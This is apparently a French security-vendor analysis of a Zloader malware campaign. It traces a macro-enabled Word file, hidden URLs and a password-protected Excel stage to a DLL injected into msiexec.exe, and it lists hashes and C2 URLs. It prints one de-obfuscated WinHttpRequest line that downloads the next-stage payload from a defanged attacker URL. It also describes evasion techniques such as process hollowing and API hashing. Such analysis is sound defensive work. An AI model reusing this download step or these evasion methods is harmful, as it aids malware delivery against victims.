Zloader: impliquant différents fichiers Office

Zloader alias Terdot – une variante du tristement célèbre malware bancaire Zeus est bien connu pour son utilisation agressive des documents «.xls», «.xlsx» comme vecteur initial pour fournir sa charge utile. Malgré cela, nous sommes récemment tombés sur le fichier «.docm» qui est utilisé par la famille Zoader pour effectuer son activité initiale. Cela montre que les adversaires aiment expérimenter les documents bureautiques pour éviter d’être détectés par les solutions de sécurité.

Fig.1-Chaîne d’attaque

Vecteur initial:

Ici, la chaîne d’infection commence par le fichier «.docm». Docm est l’abréviation de «document Word Office prenant en charge les macros». Nous pouvons voir ci-dessous, la vue du document demandant à l’utilisateur d’activer le contenu.

Fig.2- Vue du document

Comme beaucoup d’autres documents, nous avons essayé d’observer son activité après avoir activé le contenu, mais il n’y avait aucune activité. En regardant son code VBA, nous avons obtenu notre réponse. L’activation du contenu n’effectuera pas l’exécution de la macro. Ici, l’exécution de la macro commence à la «fermeture du document» comme indiqué.

Fig.3- Appel de fonction macro

Dès que la victime ferme ce document, la fonction «nnn» est appelée qui est la fonction principale de cette macro VBA. En cela, à nouveau des sous-fonctions sont appelées. Ici, les adversaires utilisent également «Userform» pour effectuer l’activité de l’étape suivante.

Fig.4- Appel de sous-fonction

La fonction UserForm_Initialize () est utilisée pour appeler «Userform2». L’image ci-dessous montre l’objet userform2. Dans sa boîte de dialogue, les données d’URL sont fragmentées et se chevauchent sur la 25e zone de liste déroulante pour masquer les données réelles, comme indiqué ci-dessous.

Fig.5- Données URL masquées

Après avoir parcouru toutes les ComboBox de userform2, nous avons pu localiser une URL malveillante qui est utilisée pour télécharger la charge utile de la 2ème étape.

Fig.6- Données d’URL fragmentées

Pour résumer l’activité ci-dessus, les adversaires utilisent la boucle for pour accéder à toutes ces valeurs et créer l’URL finale comme indiqué ci-dessous,

Fig.7- Création de l’URL à la fermeture du document

Site « hxxps[:]// feelfit-always[.]com / 1[.]php ”qui est malveillant avec un score de 11 sur le total des virus, est utilisé pour télécharger un fichier XLS protégé par mot de passe. Son mot de passe est à nouveau masqué dans la macro VBA dans «Userform1». En explorant les données userform1, nous avons pu extraire le mot de passe caché.

Fig.8- Macro Code pour protéger XLS avec mot de passe

Fig.9- Mot de passe caché XLS

Charge utile de 2e étage:

La protection du document avec un mot de passe est une technique classique pour se défendre contre les fournisseurs audiovisuels. Un mot de passe correct est nécessaire pour approfondir l’analyse. Après avoir fait correspondre le mot de passe ci-dessus, nous pouvons enfin voir le contenu du classeur Excel. La macro XLM est utilisée dans «Sheet3» pour effectuer d’autres activités.

Fig.10- Cahier XLS

Ici, le code est intégré dans différentes cellules du document. La figure ci-dessous montre le code de macro extrait du classeur ci-dessus:

Fig.11- Code de macro XLM

Ici, les adversaires utilisent des fonctions intégrées Excel comme IIF et Switch pour masquer les données. Le code dé-obscurci final peut être vu comme ci-dessous,

WinHttp.WinHttpRequest.5.1.open GET https[:]// santarosafuneralhome[.]com / 2.php Faux

WinHttp.WinHttpRequest.5.1.SetRequestHeader

WinHttp.WinHttpRequest.5.1.send

Au-dessus de l’URL malveillante ayant un score total de virus de 8 est utilisée pour télécharger la charge utile de 3e étape de cette attaque.

Analyse finale de la charge utile:

La DLL est la charge utile finale de Zloader. Ici, la DLL est très obscurcie et évite les appels directs aux API Windows. Le hachage est utilisé pour calculer les adresses et rend l’appel avec les valeurs calculées, ce qui rend l’inversion difficile.

Fig.12 – Code pour le calcul de l’adresse

La DLL crée le processus ‘msiexec.exe’, qui est un véritable processus Microsoft appartenant au programme d’installation des composants Windows, en mode suspendu et y injecte un fichier chiffré.

Fig.13- ‘msiexec.exe’ créé en mode suspendu

Fig.14- Fichier crypté injecté dans ‘msiexec.exe’

Il injecte également une routine qui décryptera et fera sortir le PE malveillant pour exécution.

Fig.15- Routine de décryptage

Avec le paramètre de contexte de thread, le point d’exécution initial est passé et enfin le code injecté est exécuté avec le thread de reprise.

Lorsque ce thread de msiexec.exe entre en exécution, il essaie de se connecter à ses serveurs CnC comme indiqué,

Étant donné que ces URL étaient en panne au moment de l’analyse, nous n’avons pas été en mesure de les approfondir.

Conclusion:

Ce type d’attaque montre comment les adversaires innovent leur mécanisme pour démarrer la chaîne d’infection pour compromettre la victime. L’utilisateur doit toujours être prudent lors de l’ouverture des fichiers Office. Les solutions de sécurité d’entreprise Quick Heal et Seqrite protègent ses clients contre de tels fichiers. N’oubliez donc pas de toujours mettre à jour les solutions de sécurité des terminaux.

CIO:

DOCM: 117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d

409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1

91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4

XLS: 52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89

URL:

https[://]tiodeitidampheater.tk/post.php

https[://]actes-etatcivil.com/post.php

https[://]ankarakreatif.com/post.php

https[://]www.ramazanyildiz.net/post.php

https[://]hispaniaeng.com/post.php

https[://]www.ifdd.francophonie.org/post.php

Expert en la matière:

Anjali Raut

Priyanka Shinde

Anjali Raut Suivre @ AnjaliR51806529